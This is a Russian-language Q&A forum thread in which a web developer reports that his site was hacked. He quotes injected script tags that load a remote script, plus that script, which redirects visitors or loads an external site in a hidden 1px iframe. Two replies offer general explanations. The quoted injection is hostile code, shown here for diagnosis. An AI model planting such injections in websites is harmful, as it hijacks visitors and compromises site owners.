mbxngtgo
@mbxngtgo
веб программист

Взломали мой сайт .А там код.Что это?

Зашел на сайт .И меня перекинуло редиректом на другую странице.
Посмотрел исходный код своего сайта и там обнаружил это :

<script type="text/javascript">var pi={width:88,height:31,color:'2D8700'}</script>
<script type="text/javascript" src="http://www.e-partner.ru/a/base/pi.js"></script>


Посмотрел этот код http://www.e-partner.ru/a/base/pi.js

Там следующее:

/*
    NOTICE! You've requested a file that is not available for remote inclusion.
*/
try{
    window.location = 'http://www.e-partner.ru';
}catch(e){
    var rframe = document.createElement("iframe");
    rframe.setAttribute('width','1px');
    rframe.setAttribute('height','1px');
    rframe.setAttribute('frameborder','0');
    rframe.setAttribute('id','rfx');
    rframe.setAttribute('src','http://www.e-partner.ru');
    document.body.appendChild(rframe);
}


Как его встроили на мой сайт ? И как там появилась?
  • Вопрос задан
  • 587 просмотров
Пригласить эксперта
Ответы на вопрос 2
PriestFromRL
@PriestFromRL
Как взломали? Да как угодно - бэкдор, взлом самой админки и таких вариантов множество. Единственное что можно сказать - эксплойт. Все) Большего тут не скажешь. Если есть старый код, хотяб недельной давности, то посмотри их различия и удали эксплойт.
Ответ написан
Комментировать
Robur
@Robur
Знаю больше чем это необходимо
Что за код? - заставляет пользователя который зашел на ваш сайт загрузить еще и www.e-partner.ru. Зачем - кто ж их знает, может просто просмотры накручивают, может трекают пользователей.
Как он к вам попал? - вы хотите чтобы люди по звездам угадали? Ищите того кто разбирается и пусть он смотрит на ваш сайт/сервер.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы